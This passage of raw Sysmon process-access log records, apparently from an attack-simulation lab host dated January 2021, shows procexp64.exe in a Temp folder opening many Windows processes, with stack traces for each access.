15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.641{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791491Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791490Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791489Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:55.626{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000791488Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 